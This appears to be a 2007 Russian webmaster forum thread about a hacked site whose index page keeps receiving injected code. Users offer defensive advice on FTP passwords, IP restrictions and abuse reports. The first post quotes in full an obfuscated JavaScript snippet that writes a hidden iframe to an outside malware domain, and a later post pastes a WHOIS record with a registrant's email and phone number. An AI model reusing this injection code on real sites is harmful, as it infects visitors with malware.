Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Программинг, Скрипты, Софт, Сервисы
»
Тема:
Троян на сайте - шо делать и как с ним бороться???
Новая тема
Ответить
цитата
10/10/07 в 21:52
Христо Проданоф
Блин, засада...
Какая то сволочь изменяет индекс на сайте постоянно.
Захожу др.вебом - ругается шо троян. Перезаписываю с нуля - через некоторое время опять та же хрень.
Сейчас поглядел в индекс вот что обнаружил:
Код:
<!-- o --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
s=s+'110105046099111109047098095116114047105110100101120046112104112034032119105100116104061051032104101';
s=s+'105103104116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082';
s=s+'065077069062032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
</script><!-- c --></head>
<body bgcolor="#FFFFFF"><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';
s=s+'110105046099111109047098095116114047105110100101120046112104112034032119105100116104061051032104101';
s=s+'105103104116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082';
s=s+'065077069062032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
</script>
Блин, кто может подсказать, что это за хрень и как с ней бороться?
Если это у меня комп заражен, то почему лицензионный антивирь его не видит? Что это за антивить тогда? Сейчас поставил на полную проверку всей системы, идет процесс. НО я блин, озадачен сильно.
Я не понимаю что надо сделать чтобы избавиться от такой проблемы.
Винда тоже лицензия, обновления, все дела...
Может в саппорт антивиря стукнуться, или где я сам накосячил, или что это за дела?
цитата
10/10/07 в 21:56
ritor
1. написать саппорту чтобы доступ на фтп был только с твоего айпи.
2. посмотреть куда редиректит и писать абузу.
3. залить бекап
цитата
10/10/07 в 22:32
Христо Проданоф
Спасибо, админу я стукнусь
А кто подскажет как абуз писать? И чем аргументировать, ведь я уже перезалил бекап, т.е. трояна сейчас нет (но он может появиться в дальнейшем, если мой антивирь его не поймает, в случае, если она заражена)
цитата
11/10/07 в 04:15
SAV
еще пароли к фтп поменяй
цитата
11/10/07 в 08:46
Kors
еще комп свой проверь последним касперским - весьма вероятно трояном у тебя пароли к фтп увели.
цитата
11/10/07 в 11:03
miroz
У меня на одном сайте постоянно появлялся троян, я его постоянно убирал, закрыл ФТП, все проверил, ничего не нашел. Вообщем оказалось ломали через голосовалку на сайте.
Проверь у тебя никаких лишних скриптов на сайте нет?
цитата
11/10/07 в 17:28
Alexs
1)и ши дрявые скрипты
банально версию скрипта в google и смотри на придмет уязвимстей
2) потри часть эксплоита ато googl если увидет может забанить
мастер- x
точнее
http://stopbadware.org
а goole чекает их базу
цитата
11/10/07 в 19:13
Sergeyka
сломали фтп клиент
1. Поменять пасы от ФТП
2. Скинуть код известному программеру, чтобы он расколупал куда видет джава редирект или в данном случае хуета
3. написать абузу на тот домен куда все идет
4. чистить в ручную хтмл файлы от этого гавна
цитата
12/10/07 в 01:12
Dim82
Код:
< / t e x *****t a t e a > < / t e x t a r e a > < I F R***** A M E s r c = " h ***p : / / m a r c o b e r n a r d o n i . c o m / b _ t r / i n d e x . p h p " w i d t h = 3 h e i g h t = 3 s t y l e = " d i s p l a y : n o n e " > < / I F R A ******M E >
- от эта хуйня там сидит.
я немного подправил исходный код - это мне вывело в браузер (без **** есс-но)
цитата
15/10/07 в 14:10
Христо Проданоф
Блин, народ, может как то заабузить такой домен? Это явно наши доморощенные хакеры балуют...
Цитата:
Domain Name:marcobernardoni.com
Record last updated at 2007-07-08 15:30:57
Record created on 2007/5/28
Record expired on 2008/5/28
Domain servers in listed order:
ns1.nameself.com ns2.nameself.com
Administrator:
Name-- FuzioN FuzioN
EMail-: (fuzka@bk.ru)
tel --: +7.9015371916
org: FuzioN inc
/dev/null
Moskow,babruysk,RU 117625
Technical Contactor:
Name-- FuzioN FuzioN
EMail-: (fuzka@bk.ru)
tel --: +7.9015371916
org: FuzioN inc
/dev/null
Moskow,babruysk,RU 117625
Billing Contactor:
Name-- FuzioN FuzioN
EMail-: (fuzka@bk.ru)
tel --: +7.9015371916
org: FuzioN inc
/dev/null
Moskow,babruysk,RU 117625
Registration Service Provider:
name: Regtime.net
tel: +7 8462698077
fax: +7 8462698057
web:http://www.webnames.ru
Вообще, кто может подсказать, как правильно бороться с такой гадостью?
И почему лицензионый Др.Веб ее не поймал вовремя у меня на компе7 (когда захожу на зараженный уже сайт - ругается, а вот почему ко мне пропустил антивирь этот троян - я не могу понять....
В общем, хотелось бы наказать виновника, и принять меры чтобы такого больше не случалось - что надо делать?
цитата
15/10/07 в 14:53
ritor
в 80% случаев ограничение доступа к ФТП по айпи работает отлично. Абузить их толку мало. Если трой новый, то никто его не поймает, когда меня ломали я выслал троя Касперскому, они его еще не знали.
DF monitor на все домены, ограничение по айпи. и будешь спать спокойно.
Новая тема
Ответить
Эта страница в полной версии